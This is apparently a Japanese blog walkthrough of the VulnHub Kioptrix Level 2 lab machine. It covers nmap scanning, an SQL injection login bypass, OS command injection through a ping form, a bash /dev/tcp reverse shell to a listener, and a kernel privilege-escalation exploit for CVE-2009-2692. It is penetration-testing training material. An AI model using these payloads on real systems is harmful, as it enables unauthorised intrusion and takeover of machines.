【VulnHub】kioptrix level2 walkthrough

VlunHub

VulnHubのkioptrix level2を実施

 

 

初期偵察

・nmapでIPアドレスを特定

nmap -sP 192.168.100.0/24
 

f:id:driasandlions55:20190130164902p:plain

IPアドレスは192.168.100.108

 

・公開されているポートを確認

nmap -sV -p- -A -n 192.168.100.108
 

f:id:driasandlions55:20190130164935p:plain

 

以下の情報が得られる

  • 公開ポートは22,80,111,443,631,773,3306(mysql)
  • Cent OS
  •  Apache2.0.52
  • OpenSSH 3.9p1

・Webページにアクセスするとログイン画面が表示される

f:id:driasandlions55:20190130165220p:plain

・初歩的なSQLインジェクションを試みる

Username:admin、Password:'or'a'='a

でログイン出来る

VMを再起動したため途中から192.168.100.109にIPが変更されています。

 

Pingを試みたいIPアドレスを入力する画面が表示されるのでIPアドレスを入れてみる

Ping結果が出力された。

f:id:driasandlions55:20190130165321p:plain

・OSコマンドインジェクションを試してみる

 

f:id:driasandlions55:20190130165721p:plain

ping結果とともに/etc/passwdの結果が表示されたのでOSコマンドインジェクションの脆弱性があるためこれを利用したい

f:id:driasandlions55:20190130165810p:plain

侵入

・nmap版 netcat(ncat)をインストール

Kali linux側でローカルの5555ポートで待ち受けるように実行

ncat -v -n -l -p 5555 

※標準のncでも可能でした

nc -lvp 5555

f:id:driasandlions55:20190130170019p:plain

 

・Webの入力フォームに以下のように入力しリバースシェルを確立

 192.168.100.102; bash -i >& /dev/tcp/192.168.100.110/5555 0>&1

  ※192.168.100.110はKali LinuxIPアドレス

f:id:driasandlions55:20190130170413p:plain

apacheユーザでログイン成功

f:id:driasandlions55:20190130170634p:plain

侵入は完了したので特権を奪取する必要がある

 

特権昇格

・侵入できたのでLinux kernelのバージョンを確認する

f:id:driasandlions55:20190130170754p:plain

   2.6.9-55であることがわかるのでこれに刺さるexploitを検索

www.exploit-db.com

上記のexploitがヒット

CVE-2009-2692(Linux Kernelのsock_sendpage関数の脆弱性)をついたexploitであった

NVD - CVE-2009-2692

 

・exploitを使用

いったんソースをkali linux側にダウンロードし、さらにwgetでターゲットで取得

f:id:driasandlions55:20190130171557p:plain

コンパイルしたファイルを実行するとrootへ権限昇格成功

f:id:driasandlions55:20190130171700p:plain

今回も/root配下にflagはなかった